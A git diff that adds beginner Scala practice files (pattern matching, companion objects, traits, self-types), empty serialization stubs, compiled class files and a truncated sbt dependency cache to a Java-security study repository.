diff --git a/JavaSecurity/JDK/Scala1/src/main/scala/LazyList/Person.scala b/JavaSecurity/JDK/Scala1/src/main/scala/LazyList/Person.scala
new file mode 100644
index 00000000..04f77ace
--- /dev/null
+++ b/JavaSecurity/JDK/Scala1/src/main/scala/LazyList/Person.scala
@@ -0,0 +1,7 @@
+package LazyList
+
+class Person extends Serializable{
+
+
+
+}
diff --git a/JavaSecurity/JDK/Scala1/src/main/scala/LazyList/Serialize.scala b/JavaSecurity/JDK/Scala1/src/main/scala/LazyList/Serialize.scala
new file mode 100644
index 00000000..3d464111
--- /dev/null
+++ b/JavaSecurity/JDK/Scala1/src/main/scala/LazyList/Serialize.scala
@@ -0,0 +1,6 @@
+package LazyList
+
+class Serialize {
+
+
+}
diff --git a/JavaSecurity/JDK/Scala1/src/main/scala/basiCode/basic/HelloWorld.scala b/JavaSecurity/JDK/Scala1/src/main/scala/basiCode/basic/HelloWorld.scala
new file mode 100644
index 00000000..75634761
--- /dev/null
+++ b/JavaSecurity/JDK/Scala1/src/main/scala/basiCode/basic/HelloWorld.scala
@@ -0,0 +1,5 @@
+object HelloSpark{
+ def main(args:Array[String]):Unit = {
+ println("Hello Spark!")
+ }
+}
\ No newline at end of file
diff --git a/JavaSecurity/JDK/Scala1/src/main/scala/basiCode/basic/Match.scala b/JavaSecurity/JDK/Scala1/src/main/scala/basiCode/basic/Match.scala
new file mode 100644
index 00000000..b575f533
--- /dev/null
+++ b/JavaSecurity/JDK/Scala1/src/main/scala/basiCode/basic/Match.scala
@@ -0,0 +1,17 @@
+package basiCode;object Match {
+ def show(result:String):Unit={
+ println(result)
+ }
+ def main(args: Array[String]): Unit = {
+ val x=11
+ val y=x match {
+ case 1 => "one"
+ case 2 => "two"
+ case other => s"other: $other" // other是一个变量名,它会接收除了1和2以外的任何值
+ case _ => s"other: _"
+ }
+ show(y)
+ //other: 11
+
+ }
+ }
diff --git a/JavaSecurity/JDK/Scala1/src/main/scala/basiCode/basic/Person.scala b/JavaSecurity/JDK/Scala1/src/main/scala/basiCode/basic/Person.scala
new file mode 100644
index 00000000..2f389344
--- /dev/null
+++ b/JavaSecurity/JDK/Scala1/src/main/scala/basiCode/basic/Person.scala
@@ -0,0 +1,67 @@
+// 定义一个Person类,作为伴生类
+class Person(val name: String, val age: Int) {
+ private val secret = "I love Scala"
+
+
+ def sayHello(): Unit = {
+ println(s"Hello, I am $name, $age years old.")
+ }
+}
+
+// 定义一个Person对象,作为伴生对象
+object Person {
+
+ var count = 0
+
+ def increase(): Unit = {
+ count += 1
+ println(s"Person count: $count")
+ }
+
+ def showSec():Unit={
+ println(apply("test",1).secret)
+ }
+
+ // 定义一个apply方法,用于创建Person类的实例
+ def apply(name: String, age: Int): Person = {
+ increase()
+ new Person(name, age) // 返回新的Person对象
+ }
+
+ // 定义一个unapply方法,用于提取Person类的属性
+ def unapply(person: Person): Option[(String, Int)] = {
+ if (person == null) None // 如果person为空,返回None
+ else Some(person.name, person.age) // 否则返回Some元组
+ }
+}
+object Main {
+
+ def main(args: Array[String]): Unit = {
+ // 使用伴生对象的apply方法创建Person类的实例,省略了new关键字
+ val p1 = Person("Alice", 20)//Person count: 1
+ val p2 = Person("Bob", 25)//Person count: 2
+
+ // 使用伴生对象的字段和方法
+ println(Person.count) // 输出2
+ Person.increase() // Person count: 3
+ Person.showSec()//输出Person count: 4
+ //I love Scala(伴生对象可以访问伴生类的私有成员)
+
+ // 使用伴生类的字段和方法
+ /*
+ println(p1.secret)// 无法访问私有成员
+ */
+ p1.sayHello() // 输出Hello, I am Alice, 20 years old.
+
+ // 使用模式匹配和提取器,利用伴生对象的unapply方法
+ val p3=null
+ p1 match {
+ case Person(name, age) => println(s"$name is $age years old.") // 输出Alice is 20 years old.
+ case _ => println("Unknown person.")
+ }
+ p3 match {
+ case Person(name, age) => println(s"$name is $age years old.") // 输出Unknown person.
+ case _ => println("Unknown person.")
+ }
+ }
+}
diff --git a/JavaSecurity/JDK/Scala1/src/main/scala/basiCode/basic/apply.scala b/JavaSecurity/JDK/Scala1/src/main/scala/basiCode/basic/apply.scala
new file mode 100644
index 00000000..8160d848
--- /dev/null
+++ b/JavaSecurity/JDK/Scala1/src/main/scala/basiCode/basic/apply.scala
@@ -0,0 +1,16 @@
+//class Person(val name: String, val age: Int)
+//
+//object Person {
+// def apply(name: String, age: Int): Person = new Person(name, age)
+//
+// def main(args: Array[String]): Unit = {
+//
+// // 使用 apply 方法创建对象
+// val person = Person("Alice", 25)
+// println(person.name)
+// }
+//
+//}
+//
+//
+//
diff --git a/JavaSecurity/JDK/Scala1/src/main/scala/basiCode/self_type/Cat.scala b/JavaSecurity/JDK/Scala1/src/main/scala/basiCode/self_type/Cat.scala
new file mode 100644
index 00000000..23bcfa96
--- /dev/null
+++ b/JavaSecurity/JDK/Scala1/src/main/scala/basiCode/self_type/Cat.scala
@@ -0,0 +1,44 @@
+package basiCode.self_type
+
+
+object Cat {
+
+ class Cat {
+ val name: String = "Tom"
+ val color: String = "Gray"
+
+ def meow(): Unit = println("Meow!")
+
+ }
+ trait Talkative {
+ def talk(): Unit
+ }
+
+ trait Singer {
+ self: Talkative => // 声明自身类型,表示Singer依赖于Talkative
+ def sing(): Unit = {
+ talk() // 可以直接使用Talkative的成员
+ println("La la la...")
+ }
+ }
+
+ trait Dancer {
+ self: Singer => // 声明自身类型,表示Dancer依赖于Singer
+ def dance(): Unit = {
+ sing() // 可以直接使用Singer的成员
+ println("Shake shake shake...")
+ }
+ }
+
+ def main(args: Array[String]): Unit = {
+ val tom = new Cat with Talkative with Singer with Dancer {
+ override def talk(): Unit = {
+ println("test")
+ }
+ } // 创建一个会说话、唱歌、跳舞的猫
+ tom.talk() // 输出:Meow!
+ tom.sing() // 输出:Meow! La la la...
+ tom.dance() // 输出:Meow! La la la... Shake shake shake...
+ }
+
+}
diff --git a/JavaSecurity/JDK/Scala1/src/main/scala/basiCode/trait/PersonBody.scala b/JavaSecurity/JDK/Scala1/src/main/scala/basiCode/trait/PersonBody.scala
new file mode 100644
index 00000000..345128e5
--- /dev/null
+++ b/JavaSecurity/JDK/Scala1/src/main/scala/basiCode/trait/PersonBody.scala
@@ -0,0 +1,6 @@
+package basiCode.`trait`
+
+trait PersonBody {
+
+ val height: Int
+}
diff --git a/JavaSecurity/JDK/Scala1/src/main/scala/basiCode/trait/PersonBodyImpl.scala b/JavaSecurity/JDK/Scala1/src/main/scala/basiCode/trait/PersonBodyImpl.scala
new file mode 100644
index 00000000..1df87475
--- /dev/null
+++ b/JavaSecurity/JDK/Scala1/src/main/scala/basiCode/trait/PersonBodyImpl.scala
@@ -0,0 +1,13 @@
+import basiCode.`trait`.PersonBody
+
+object PersonBodyImpl {
+
+ class PersonBodyImpl(name : String) extends PersonBody{
+ override val height: Int = 185
+ }
+ def main(args: Array[String]): Unit = {
+ var person = new PersonBodyImpl("Cloud")
+ println(person.height)
+ //185
+ }
+}
\ No newline at end of file
diff --git a/JavaSecurity/JDK/Scala1/src/main/scala/basiCode/trait/PersonBodyImpls.scala b/JavaSecurity/JDK/Scala1/src/main/scala/basiCode/trait/PersonBodyImpls.scala
new file mode 100644
index 00000000..0f586ad7
--- /dev/null
+++ b/JavaSecurity/JDK/Scala1/src/main/scala/basiCode/trait/PersonBodyImpls.scala
@@ -0,0 +1,25 @@
+import basiCode.`trait`.{PersonBody, PersonHobby}
+
+object PersonBodyImpls {
+
+ class PersonBodyImpls(name : String) extends PersonBody with PersonHobby {
+
+ override def showHobby(): Unit = {
+ println(hobbyGame)
+ }
+
+ override val height: Int = 185
+
+ override var hobbyGame: String = "Drunkbaby sleep"
+
+ }
+
+ def main(args: Array[String]): Unit = {
+ var person = new PersonBodyImpls("Cloud")
+ person.showHobby()
+
+ }
+
+
+}
+
diff --git a/JavaSecurity/JDK/Scala1/src/main/scala/basiCode/trait/PersonHobby.scala b/JavaSecurity/JDK/Scala1/src/main/scala/basiCode/trait/PersonHobby.scala
new file mode 100644
index 00000000..d3634333
--- /dev/null
+++ b/JavaSecurity/JDK/Scala1/src/main/scala/basiCode/trait/PersonHobby.scala
@@ -0,0 +1,6 @@
+package basiCode.`trait`
+
+trait PersonHobby{
+ var hobbyGame: String
+ def showHobby()
+}
\ No newline at end of file
diff --git a/JavaSecurity/JDK/Scala1/target/scala-2.13/classes/HelloSpark$.class b/JavaSecurity/JDK/Scala1/target/scala-2.13/classes/HelloSpark$.class
new file mode 100644
index 00000000..5731117a
Binary files /dev/null and b/JavaSecurity/JDK/Scala1/target/scala-2.13/classes/HelloSpark$.class differ
diff --git a/JavaSecurity/JDK/Scala1/target/scala-2.13/classes/HelloSpark.class b/JavaSecurity/JDK/Scala1/target/scala-2.13/classes/HelloSpark.class
new file mode 100644
index 00000000..c1710a19
Binary files /dev/null and b/JavaSecurity/JDK/Scala1/target/scala-2.13/classes/HelloSpark.class differ
diff --git a/JavaSecurity/JDK/Scala1/target/scala-2.13/classes/Main$.class b/JavaSecurity/JDK/Scala1/target/scala-2.13/classes/Main$.class
new file mode 100644
index 00000000..7fea1daa
Binary files /dev/null and b/JavaSecurity/JDK/Scala1/target/scala-2.13/classes/Main$.class differ
diff --git a/JavaSecurity/JDK/Scala1/target/scala-2.13/classes/Main.class b/JavaSecurity/JDK/Scala1/target/scala-2.13/classes/Main.class
new file mode 100644
index 00000000..e188c1ef
Binary files /dev/null and b/JavaSecurity/JDK/Scala1/target/scala-2.13/classes/Main.class differ
diff --git a/JavaSecurity/JDK/Scala1/target/scala-2.13/classes/Person$.class b/JavaSecurity/JDK/Scala1/target/scala-2.13/classes/Person$.class
new file mode 100644
index 00000000..82e8b461
Binary files /dev/null and b/JavaSecurity/JDK/Scala1/target/scala-2.13/classes/Person$.class differ
diff --git a/JavaSecurity/JDK/Scala1/target/scala-2.13/classes/Person.class b/JavaSecurity/JDK/Scala1/target/scala-2.13/classes/Person.class
new file mode 100644
index 00000000..299976d1
Binary files /dev/null and b/JavaSecurity/JDK/Scala1/target/scala-2.13/classes/Person.class differ
diff --git a/JavaSecurity/JDK/Scala1/target/scala-2.13/classes/PersonBodyImpl$.class b/JavaSecurity/JDK/Scala1/target/scala-2.13/classes/PersonBodyImpl$.class
new file mode 100644
index 00000000..bfd290a4
Binary files /dev/null and b/JavaSecurity/JDK/Scala1/target/scala-2.13/classes/PersonBodyImpl$.class differ
diff --git a/JavaSecurity/JDK/Scala1/target/scala-2.13/classes/PersonBodyImpl$PersonBodyImpl.class b/JavaSecurity/JDK/Scala1/target/scala-2.13/classes/PersonBodyImpl$PersonBodyImpl.class
new file mode 100644
index 00000000..96f4179d
Binary files /dev/null and b/JavaSecurity/JDK/Scala1/target/scala-2.13/classes/PersonBodyImpl$PersonBodyImpl.class differ
diff --git a/JavaSecurity/JDK/Scala1/target/scala-2.13/classes/PersonBodyImpl.class b/JavaSecurity/JDK/Scala1/target/scala-2.13/classes/PersonBodyImpl.class
new file mode 100644
index 00000000..69bcdbab
Binary files /dev/null and b/JavaSecurity/JDK/Scala1/target/scala-2.13/classes/PersonBodyImpl.class differ
diff --git a/JavaSecurity/JDK/Scala1/target/scala-2.13/classes/PersonBodyImpls$.class b/JavaSecurity/JDK/Scala1/target/scala-2.13/classes/PersonBodyImpls$.class
new file mode 100644
index 00000000..2ef29221
Binary files /dev/null and b/JavaSecurity/JDK/Scala1/target/scala-2.13/classes/PersonBodyImpls$.class differ
diff --git a/JavaSecurity/JDK/Scala1/target/scala-2.13/classes/PersonBodyImpls$PersonBodyImpls.class b/JavaSecurity/JDK/Scala1/target/scala-2.13/classes/PersonBodyImpls$PersonBodyImpls.class
new file mode 100644
index 00000000..99efe675
Binary files /dev/null and b/JavaSecurity/JDK/Scala1/target/scala-2.13/classes/PersonBodyImpls$PersonBodyImpls.class differ
diff --git a/JavaSecurity/JDK/Scala1/target/scala-2.13/classes/PersonBodyImpls.class b/JavaSecurity/JDK/Scala1/target/scala-2.13/classes/PersonBodyImpls.class
new file mode 100644
index 00000000..a1926f4c
Binary files /dev/null and b/JavaSecurity/JDK/Scala1/target/scala-2.13/classes/PersonBodyImpls.class differ
diff --git a/JavaSecurity/JDK/Scala1/target/scala-2.13/classes/basiCode/Match$.class b/JavaSecurity/JDK/Scala1/target/scala-2.13/classes/basiCode/Match$.class
new file mode 100644
index 00000000..18eb0d9b
Binary files /dev/null and b/JavaSecurity/JDK/Scala1/target/scala-2.13/classes/basiCode/Match$.class differ
diff --git a/JavaSecurity/JDK/Scala1/target/scala-2.13/classes/basiCode/Match.class b/JavaSecurity/JDK/Scala1/target/scala-2.13/classes/basiCode/Match.class
new file mode 100644
index 00000000..e2d792cb
Binary files /dev/null and b/JavaSecurity/JDK/Scala1/target/scala-2.13/classes/basiCode/Match.class differ
diff --git a/JavaSecurity/JDK/Scala1/target/scala-2.13/classes/basiCode/self_type/Cat$$anon1ドル.class b/JavaSecurity/JDK/Scala1/target/scala-2.13/classes/basiCode/self_type/Cat$$anon1ドル.class
new file mode 100644
index 00000000..d6906263
Binary files /dev/null and b/JavaSecurity/JDK/Scala1/target/scala-2.13/classes/basiCode/self_type/Cat$$anon1ドル.class differ
diff --git a/JavaSecurity/JDK/Scala1/target/scala-2.13/classes/basiCode/self_type/Cat$.class b/JavaSecurity/JDK/Scala1/target/scala-2.13/classes/basiCode/self_type/Cat$.class
new file mode 100644
index 00000000..7f96c1f7
Binary files /dev/null and b/JavaSecurity/JDK/Scala1/target/scala-2.13/classes/basiCode/self_type/Cat$.class differ
diff --git a/JavaSecurity/JDK/Scala1/target/scala-2.13/classes/basiCode/self_type/Cat$Cat.class b/JavaSecurity/JDK/Scala1/target/scala-2.13/classes/basiCode/self_type/Cat$Cat.class
new file mode 100644
index 00000000..43784d4c
Binary files /dev/null and b/JavaSecurity/JDK/Scala1/target/scala-2.13/classes/basiCode/self_type/Cat$Cat.class differ
diff --git a/JavaSecurity/JDK/Scala1/target/scala-2.13/classes/basiCode/self_type/Cat$Dancer.class b/JavaSecurity/JDK/Scala1/target/scala-2.13/classes/basiCode/self_type/Cat$Dancer.class
new file mode 100644
index 00000000..d452cc25
Binary files /dev/null and b/JavaSecurity/JDK/Scala1/target/scala-2.13/classes/basiCode/self_type/Cat$Dancer.class differ
diff --git a/JavaSecurity/JDK/Scala1/target/scala-2.13/classes/basiCode/self_type/Cat$Singer.class b/JavaSecurity/JDK/Scala1/target/scala-2.13/classes/basiCode/self_type/Cat$Singer.class
new file mode 100644
index 00000000..6c56b602
Binary files /dev/null and b/JavaSecurity/JDK/Scala1/target/scala-2.13/classes/basiCode/self_type/Cat$Singer.class differ
diff --git a/JavaSecurity/JDK/Scala1/target/scala-2.13/classes/basiCode/self_type/Cat$Talkative.class b/JavaSecurity/JDK/Scala1/target/scala-2.13/classes/basiCode/self_type/Cat$Talkative.class
new file mode 100644
index 00000000..d7f3d07f
Binary files /dev/null and b/JavaSecurity/JDK/Scala1/target/scala-2.13/classes/basiCode/self_type/Cat$Talkative.class differ
diff --git a/JavaSecurity/JDK/Scala1/target/scala-2.13/classes/basiCode/self_type/Cat.class b/JavaSecurity/JDK/Scala1/target/scala-2.13/classes/basiCode/self_type/Cat.class
new file mode 100644
index 00000000..7e7ed7dc
Binary files /dev/null and b/JavaSecurity/JDK/Scala1/target/scala-2.13/classes/basiCode/self_type/Cat.class differ
diff --git a/JavaSecurity/JDK/Scala1/target/scala-2.13/classes/basiCode/trait/PersonBody.class b/JavaSecurity/JDK/Scala1/target/scala-2.13/classes/basiCode/trait/PersonBody.class
new file mode 100644
index 00000000..fb1e1b16
Binary files /dev/null and b/JavaSecurity/JDK/Scala1/target/scala-2.13/classes/basiCode/trait/PersonBody.class differ
diff --git a/JavaSecurity/JDK/Scala1/target/scala-2.13/classes/basiCode/trait/PersonHobby.class b/JavaSecurity/JDK/Scala1/target/scala-2.13/classes/basiCode/trait/PersonHobby.class
new file mode 100644
index 00000000..4b7d8856
Binary files /dev/null and b/JavaSecurity/JDK/Scala1/target/scala-2.13/classes/basiCode/trait/PersonHobby.class differ
diff --git a/JavaSecurity/JDK/Scala1/target/scala-2.13/update/update_cache_2.13/inputs b/JavaSecurity/JDK/Scala1/target/scala-2.13/update/update_cache_2.13/inputs
new file mode 100644
index 00000000..df642f7c
--- /dev/null
+++ b/JavaSecurity/JDK/Scala1/target/scala-2.13/update/update_cache_2.13/inputs
@@ -0,0 +1 @@
+490089905
\ No newline at end of file
diff --git a/JavaSecurity/JDK/Scala1/target/scala-2.13/update/update_cache_2.13/output b/JavaSecurity/JDK/Scala1/target/scala-2.13/update/update_cache_2.13/output
new file mode 100644
index 00000000..9a48fde1
--- /dev/null
+++ b/JavaSecurity/JDK/Scala1/target/scala-2.13/update/update_cache_2.13/output
@@ -0,0 +1 @@
+{"cachedDescriptor":".","configurations":[{"configuration":{"name":"compile"},"modules":[{"module":{"organization":"org.scala-lang","name":"scala-library","revision":"2.13.8","configurations":"default","isChanging":false,"isTransitive":true,"isForce":false,"explicitArtifacts":[],"inclusions":[],"exclusions":[],"extraAttributes":{"info.apiURL":"https://www.scala-lang.org/api/2.13.8/"},"crossVersion":{"type":"Disabled"}},"artifacts":[[{"name":"scala-library","type":"jar","extension":"jar","configurations":[],"url":"https://repo1.maven.org/maven2/org/scala-lang/scala-library/2.13.8/scala-library-2.13.8.jar","extraAttributes":{"info.apiURL":"https://www.scala-lang.org/api/2.13.8/"},"allowInsecureProtocol":false},"file:///Users/drunkbaby/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-lang/scala-library/2.13.8/scala-library-2.13.8.jar"]],"missingArtifacts":[],"evicted":false,"homepage":"https://www.scala-lang.org/","extraAttributes":{"info.apiURL":"https://www.scala-lang.org/api/2.13.8/"},"configurations":[{"name":"test"},{"name":"optional"},{"name":"compile"},{"name":"default"},{"name":"runtime"}],"licenses":[["Apache-2.0","https://www.apache.org/licenses/LICENSE-2.0"]],"callers":[]}],"details":[]},{"configuration":{"name":"compile-internal"},"modules":[{"module":{"organization":"org.scala-lang","name":"scala-library","revision":"2.13.8","configurations":"default","isChanging":false,"isTransitive":true,"isForce":false,"explicitArtifacts":[],"inclusions":[],"exclusions":[],"extraAttributes":{"info.apiURL":"https://www.scala-lang.org/api/2.13.8/"},"crossVersion":{"type":"Disabled"}},"artifacts":[[{"name":"scala-library","type":"jar","extension":"jar","configurations":[],"url":"https://repo1.maven.org/maven2/org/scala-lang/scala-library/2.13.8/scala-library-2.13.8.jar","extraAttributes":{"info.apiURL":"https://www.scala-lang.org/api/2.13.8/"},"allowInsecureProtocol":false},"file:///Users/drunkbaby/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-lang/scala-library/2.13.8/scala-library-2.13.8.jar"]],"missingArtifacts":[],"evicted":false,"homepage":"https://www.scala-lang.org/","extraAttributes":{"info.apiURL":"https://www.scala-lang.org/api/2.13.8/"},"configurations":[{"name":"test"},{"name":"optional"},{"name":"compile"},{"name":"default"},{"name":"runtime"}],"licenses":[["Apache-2.0","https://www.apache.org/licenses/LICENSE-2.0"]],"callers":[]}],"details":[]},{"configuration":{"name":"docs"},"modules":[],"details":[]},{"configuration":{"name":"optional"},"modules":[],"details":[]},{"configuration":{"name":"plugin"},"modules":[],"details":[]},{"configuration":{"name":"pom"},"modules":[],"details":[]},{"configuration":{"name":"provided"},"modules":[],"details":[]},{"configuration":{"name":"runtime"},"modules":[{"module":{"organization":"org.scala-lang","name":"scala-library","revision":"2.13.8","configurations":"default","isChanging":false,"isTransitive":true,"isForce":false,"explicitArtifacts":[],"inclusions":[],"exclusions":[],"extraAttributes":{"info.apiURL":"https://www.scala-lang.org/api/2.13.8/"},"crossVersion":{"type":"Disabled"}},"artifacts":[[{"name":"scala-library","type":"jar","extension":"jar","configurations":[],"url":"https://repo1.maven.org/maven2/org/scala-lang/scala-library/2.13.8/scala-library-2.13.8.jar","extraAttributes":{"info.apiURL":"https://www.scala-lang.org/api/2.13.8/"},"allowInsecureProtocol":false},"file:///Users/drunkbaby/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-lang/scala-library/2.13.8/scala-library-2.13.8.jar"]],"missingArtifacts":[],"evicted":false,"homepage":"https://www.scala-lang.org/","extraAttributes":{"info.apiURL":"https://www.scala-lang.org/api/2.13.8/"},"configurations":[{"name":"test"},{"name":"optional"},{"name":"compile"},{"name":"default"},{"name":"runtime"}],"licenses":[["Apache-2.0","https://www.apache.org/licenses/LICENSE-2.0"]],"callers":[]}],"details":[]},{"configuration":{"name":"runtime-internal"},"modules":[{"module":{"organization":"org.scala-lang","name":"scala-library","revision":"2.13.8","configurations":"default","isChanging":false,"isTransitive":true,"isForce":false,"explicitArtifacts":[],"inclusions":[],"exclusions":[],"extraAttributes":{"info.apiURL":"https://www.scala-lang.org/api/2.13.8/"},"crossVersion":{"type":"Disabled"}},"artifacts":[[{"name":"scala-library","type":"jar","extension":"jar","configurations":[],"url":"https://repo1.maven.org/maven2/org/scala-lang/scala-library/2.13.8/scala-library-2.13.8.jar","extraAttributes":{"info.apiURL":"https://www.scala-lang.org/api/2.13.8/"},"allowInsecureProtocol":false},"file:///Users/drunkbaby/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-lang/scala-library/2.13.8/scala-library-2.13.8.jar"]],"missingArtifacts":[],"evicted":false,"homepage":"https://www.scala-lang.org/","extraAttributes":{"info.apiURL":"https://www.scala-lang.org/api/2.13.8/"},"configurations":[{"name":"test"},{"name":"optional"},{"name":"compile"},{"name":"default"},{"name":"runtime"}],"licenses":[["Apache-2.0","https://www.apache.org/licenses/LICENSE-2.0"]],"callers":[]}],"details":[]},{"configuration":{"name":"scala-doc-tool"},"modules":[],"details":[]},{"configuration":{"name":"scala-tool"},"modules":[{"module":{"organization":"org.scala-lang","name":"scala-compiler","revision":"2.13.8","configurations":"default","isChanging":false,"isTransitive":true,"isForce":false,"explicitArtifacts":[],"inclusions":[],"exclusions":[],"extraAttributes":{"info.apiURL":"https://www.scala-lang.org/api/2.13.8/scala-compiler/"},"crossVersion":{"type":"Disabled"}},"artifacts":[[{"name":"scala-compiler","type":"jar","extension":"jar","configurations":[],"url":"https://repo1.maven.org/maven2/org/scala-lang/scala-compiler/2.13.8/scala-compiler-2.13.8.jar","extraAttributes":{"info.apiURL":"https://www.scala-lang.org/api/2.13.8/scala-compiler/"},"allowInsecureProtocol":false},"file:///Users/drunkbaby/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-lang/scala-compiler/2.13.8/scala-compiler-2.13.8.jar"]],"missingArtifacts":[],"evicted":false,"homepage":"https://www.scala-lang.org/","extraAttributes":{"info.apiURL":"https://www.scala-lang.org/api/2.13.8/scala-compiler/"},"configurations":[{"name":"test"},{"name":"optional"},{"name":"compile"},{"name":"default"},{"name":"runtime"}],"licenses":[["Apache-2.0","https://www.apache.org/licenses/LICENSE-2.0"]],"callers":[]},{"module":{"organization":"org.scala-lang","name":"scala-compiler","revision":"2.13.8","configurations":"optional","isChanging":false,"isTransitive":true,"isForce":false,"explicitArtifacts":[],"inclusions":[],"exclusions":[],"extraAttributes":{"info.apiURL":"https://www.scala-lang.org/api/2.13.8/scala-compiler/"},"crossVersion":{"type":"Disabled"}},"artifacts":[[{"name":"scala-compiler","type":"jar","extension":"jar","configurations":[],"url":"https://repo1.maven.org/maven2/org/scala-lang/scala-compiler/2.13.8/scala-compiler-2.13.8.jar","extraAttributes":{"info.apiURL":"https://www.scala-lang.org/api/2.13.8/scala-compiler/"},"allowInsecureProtocol":false},"file:///Users/drunkbaby/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-lang/scala-compiler/2.13.8/scala-compiler-2.13.8.jar"]],"missingArtifacts":[],"evicted":false,"homepage":"https://www.scala-lang.org/","extraAttributes":{"info.apiURL":"https://www.scala-lang.org/api/2.13.8/scala-compiler/"},"configurations":[{"name":"test"},{"name":"optional"},{"name":"compile"},{"name":"default"},{"name":"runtime"}],"licenses":[["Apache-2.0","https://www.apache.org/licenses/LICENSE-2.0"]],"callers":[]},{"module":{"organization":"org.scala-lang","name":"scala-library","revision":"2.13.8","configurations":"default","isChanging":false,"isTransitive":true,"isForce":false,"explicitArtifacts":[],"inclusions":[],"exclusions":[],"extraAttributes":{"info.apiURL":"https://www.scala-lang.org/api/2.13.8/"},"crossVersion":{"type":"Disabled"}},"artifacts":[[{"name":"scala-library","type":"jar","extension":"jar","configurations":[],"url":"https://repo1.maven.org/maven2/org/scala-lang/scala-library/2.13.8/scala-library-2.13.8.jar","extraAttributes":{"info.apiURL":"https://www.scala-lang.org/api/2.13.8/"},"allowInsecureProtocol":false},"file:///Users/drunkbaby/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-lang/scala-library/2.13.8/scala-library-2.13.8.jar"]],"missingArtifacts":[],"evicted":false,"homepage":"https://www.scala-lang.org/","extraAttributes":{"info.apiURL":"https://www.scala-lang.org/api/2.13.8/"},"configurations":[{"name":"test"},{"name":"optional"},{"name":"compile"},{"name":"default"},{"name":"runtime"}],"licenses":[["Apache-2.0","https://www.apache.org/licenses/LICENSE-2.0"]],"callers":[]},{"module":{"organization":"org.scala-lang","name":"scala-library","revision":"2.13.8","configurations":"optional","isChanging":false,"isTransitive":true,"isForce":false,"explicitArtifacts":[],"inclusions":[],"exclusions":[],"extraAttributes":{"info.apiURL":"https://www.scala-lang.org/api/2.13.8/"},"crossVersion":{"type":"Disabled"}},"artifacts":[[{"name":"scala-library","type":"jar","extension":"jar","configurations":[],"url":"https://repo1.maven.org/maven2/org/scala-lang/scala-library/2.13.8/scala-library-2.13.8.jar","extraAttributes":{"info.apiURL":"https://www.scala-lang.org/api/2.13.8/"},"allowInsecureProtocol":false},"file:///Users/drunkbaby/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-lang/scala-library/2.13.8/scala-library-2.13.8.jar"]],"missingArtifacts":[],"evicted":false,"homepage":"https://www.scala-lang.org/","extraAttributes":{"info.apiURL":"https://www.scala-lang.org/api/2.13.8/"},"configurations":[{"name":"test"},{"name":"optional"},{"name":"compile"},{"name":"default"},{"name":"runtime"}],"licenses":[["Apache-2.0","https://www.apache.org/licenses/LICENSE-2.0"]],"callers":[]},{"module":{"organization":"org.scala-lang","name":"scala-reflect","revision":"2.13.8","configurations":"default","isChanging":false,"isTransitive":true,"isForce":false,"explicitArtifacts":[],"inclusions":[],"exclusions":[],"extraAttributes":{"info.apiURL":"https://www.scala-lang.org/api/2.13.8/scala-reflect/"},"crossVersion":{"type":"Disabled"}},"artifacts":[[{"name":"scala-reflect","type":"jar","extension":"jar","configurations":[],"url":"https://repo1.maven.org/maven2/org/scala-lang/scala-reflect/2.13.8/scala-reflect-2.13.8.jar","extraAttributes":{"info.apiURL":"https://www.scala-lang.org/api/2.13.8/scala-reflect/"},"allowInsecureProtocol":false},"file:///Users/drunkbaby/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-lang/scala-reflect/2.13.8/scala-reflect-2.13.8.jar"]],"missingArtifacts":[],"evicted":false,"homepage":"https://www.scala-lang.org/","extraAttributes":{"info.apiURL":"https://www.scala-lang.org/api/2.13.8/scala-reflect/"},"configurations":[{"name":"test"},{"name":"optional"},{"name":"compile"},{"name":"default"},{"name":"runtime"}],"licenses":[["Apache-2.0","https://www.apache.org/licenses/LICENSE-2.0"]],"callers":[]},{"module":{"organization":"org.jline","name":"jline","revision":"3.21.0","configurations":"default","isChanging":false,"isTransitive":true,"isForce":false,"explicitArtifacts":[],"inclusions":[],"exclusions":[],"extraAttributes":{},"crossVersion":{"type":"Disabled"}},"artifacts":[[{"name":"jline","type":"jar","extension":"jar","configurations":[],"url":"https://repo1.maven.org/maven2/org/jline/jline/3.21.0/jline-3.21.0.jar","extraAttributes":{},"allowInsecureProtocol":false},"file:///Users/drunkbaby/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/jline/jline/3.21.0/jline-3.21.0.jar"]],"missingArtifacts":[],"evicted":false,"extraAttributes":{},"configurations":[{"name":"test"},{"name":"optional"},{"name":"compile"},{"name":"default"},{"name":"runtime"}],"licenses":[],"callers":[]},{"module":{"organization":"net.java.dev.jna","name":"jna","revision":"5.9.0","configurations":"default","isChanging":false,"isTransitive":true,"isForce":false,"explicitArtifacts":[],"inclusions":[],"exclusions":[],"extraAttributes":{},"crossVersion":{"type":"Disabled"}},"artifacts":[[{"name":"jna","type":"jar","extension":"jar","configurations":[],"url":"https://repo1.maven.org/maven2/net/java/dev/jna/jna/5.9.0/jna-5.9.0.jar","extraAttributes":{},"allowInsecureProtocol":false},"file:///Users/drunkbaby/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/net/java/dev/jna/jna/5.9.0/jna-5.9.0.jar"]],"missingArtifacts":[],"evicted":false,"homepage":"https://github.com/java-native-access/jna","extraAttributes":{},"configurations":[{"name":"test"},{"name":"optional"},{"name":"compile"},{"name":"default"},{"name":"runtime"}],"licenses":[["LGPL-2.1-or-later","https://www.gnu.org/licenses/old-licenses/lgpl-2.1"],["Apache-2.0","https://www.apache.org/licenses/LICENSE-2.0.txt"]],"callers":[]}],"details":[]},{"configuration":{"name":"sources"},"modules":[],"details":[]},{"configuration":{"name":"test"},"modules":[{"module":{"organization":"org.scala-lang","name":"scala-library","revision":"2.13.8","configurations":"default","isChanging":false,"isTransitive":true,"isForce":false,"explicitArtifacts":[],"inclusions":[],"exclusions":[],"extraAttributes":{"info.apiURL":"https://www.scala-lang.org/api/2.13.8/"},"crossVersion":{"type":"Disabled"}},"artifacts":[[{"name":"scala-library","type":"jar","extension":"jar","configurations":[],"url":"https://repo1.maven.org/maven2/org/scala-lang/scala-library/2.13.8/scala-library-2.13.8.jar","extraA